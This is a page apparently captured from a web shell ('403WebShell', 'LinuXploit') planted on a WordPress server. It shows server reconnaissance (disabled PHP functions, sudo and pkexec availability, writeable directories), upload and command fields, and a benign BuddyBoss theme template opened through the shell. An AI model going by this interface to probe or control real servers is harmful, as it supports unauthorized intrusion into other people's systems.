Uname:Linux server.rehabsharif.com 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64

Base Dir : /home/nobi37te/public_html

User : nobi37te


403WebShell
403Webshell
Server IP : 104.21.25.182  /  Your IP : 216.73.216.140
Web Server : Apache
System : Linux server.rehabsharif.com 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64
User : nobi37te ( 1003)
PHP Version : 8.2.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/nobi37te/public_html/wp-content/themes/buddyboss-theme/template-parts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/nobi37te/public_html/wp-content/themes/buddyboss-theme/template-parts/content-resume.php
<?php
/**
 * Template part for displaying resume content
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package BuddyBoss_Theme
 */
?>

<?php 
global $post;
?>

<article id="post-<?php the_ID(); ?>" <?php post_class(); ?>>

		<div class="entry-content-wrap">
        
            <?php 
            $featured_img_style = buddyboss_theme_get_option( 'blog_featured_img' );
            
            if ( !empty( $featured_img_style ) && ($featured_img_style == "full-fi-invert") ) {
            
                if ( is_single() && ! is_related_posts() ) { ?>
    				<?php if ( has_post_thumbnail() ) { ?>
    					<figure class="entry-media entry-img bb-vw-container1">
							<?php the_post_thumbnail( 'large', array( 'sizes' => '(max-width:768px) 768px, (max-width:1024px) 1024px, (max-width:1920px) 1920px, 1024px' ) ); ?>
    					</figure>                    
    				<?php } ?>
    			<?php } ?>
    
    			<?php
    			if ( has_post_format( 'link' ) && ( !is_singular() || is_related_posts() ) ) {
    				echo '<span class="post-format-icon" aria-label="' . esc_attr__( 'Link', 'buddyboss-theme' ) . '"><i class="bb-icon-l bb-icon-link"></i></span>';
    			}
    
    			if ( has_post_format( 'quote' ) && ( !is_singular() || is_related_posts() ) ) {
    				echo '<span class="post-format-icon white" aria-label="' . esc_attr__( 'Quote', 'buddyboss-theme' ) . '"><i class="bb-icon-l bb-icon-quote-left"></i></span>';
    			}
    			?>
    
    			<header class="entry-header">
    				<?php
    				if ( is_singular() && ! is_related_posts() ) :
    					the_title( '<h1 class="entry-title">', '</h1>' );
    				else :
                        $prefix = "";
                        if( has_post_format( 'link' ) ){
                            $prefix = __( '[Link]', 'buddyboss-theme' );
                            $prefix .= " ";//whitespace
                        }
    					the_title( '<h2 class="entry-title"><a href="' . esc_url( get_permalink() ) . '" rel="bookmark">' . $prefix, '</a></h2>' );
    				endif;
    				?>
                    
                    <?php if( has_post_format( 'link' ) && function_exists( 'buddyboss_theme_get_first_url_content' ) && ( $first_url = buddyboss_theme_get_first_url_content( $post->post_content ) ) != "" ):?>
                    <p class="post-main-link"><?php echo $first_url;?></p>
                    <?php endif; ?>
    			</header><!-- .entry-header -->
    
    			<?php if ( !is_singular() || is_related_posts() ) { ?>
    				<div class="entry-content">
    					<?php the_excerpt(); ?>
    				</div>
    			<?php } ?>
            
            <?php } else { ?>
    
    			<?php
    			if ( has_post_format( 'link' ) && ( !is_singular() || is_related_posts() ) ) {
    				echo '<span class="post-format-icon" aria-label="' . esc_attr__( 'Link', 'buddyboss-theme' ) . '"><i class="bb-icon-l bb-icon-link"></i></span>';
    			}
    
    			if ( has_post_format( 'quote' ) && ( !is_singular() || is_related_posts() ) ) {
    				echo '<span class="post-format-icon white" aria-label="' . esc_attr__( 'Quote', 'buddyboss-theme' ) . '"><i class="bb-icon-l bb-icon-quote-left"></i></span>';
    			}
    			?>
    
    			<header class="entry-header">
    				<?php
    				if ( is_singular() && ! is_related_posts() ) :
    					the_title( '<h1 class="entry-title">', '</h1>' );
    				else :
                        $prefix = "";
                        if( has_post_format( 'link' ) ){
                            $prefix = __( '[Link]', 'buddyboss-theme' );
                            $prefix .= " ";//whitespace
                        }
    					the_title( '<h2 class="entry-title"><a href="' . esc_url( get_permalink() ) . '" rel="bookmark">' . $prefix, '</a></h2>' );
    				endif;
    				?>
                    
                    <?php if( has_post_format( 'link' ) && function_exists( 'buddyboss_theme_get_first_url_content' ) && ( $first_url = buddyboss_theme_get_first_url_content( $post->post_content ) ) != "" ):?>
                    <p class="post-main-link"><?php echo $first_url;?></p>
                    <?php endif; ?>
    			</header><!-- .entry-header -->
    
    			<?php if ( !is_singular() || is_related_posts() ) { ?>
    				<div class="entry-content">
    					<?php the_excerpt(); ?>
    				</div>
    			<?php } ?>
    
    			<?php if ( is_single() && ! is_related_posts() ) { ?>
    				<?php if ( has_post_thumbnail() ) { ?>
    					<figure class="entry-media entry-img bb-vw-container1">
							<?php if ( !empty( $featured_img_style ) && $featured_img_style == "full-fi" ) {
								the_post_thumbnail( 'large', array( 'sizes' => '(max-width:768px) 768px, (max-width:1024px) 1024px, (max-width:1920px) 1920px, 1024px' ) );
							} else {
								the_post_thumbnail( 'large' ); 
							} ?>
    					</figure>
    				<?php } ?>
    			<?php } ?>
                
            <?php } ?>
            
			<div class="entry-content">
				<?php
				if ( is_singular() && ! is_related_posts() ) {
					the_content( sprintf(
					wp_kses(
					/* translators: %s: Name of current post. Only visible to screen readers */
					__( 'Continue reading<span class="screen-reader-text"> "%s"</span>', 'buddyboss-theme' ), array(
						'span' => array(
							'class' => array(),
						),
					)
					), get_the_title()
					) );
				}
				?>
			</div><!-- .entry-content -->
		</div>

</article><!-- #post-<?php the_ID(); ?> -->

Youez - 2016 - github.com/yon3zu
LinuXploit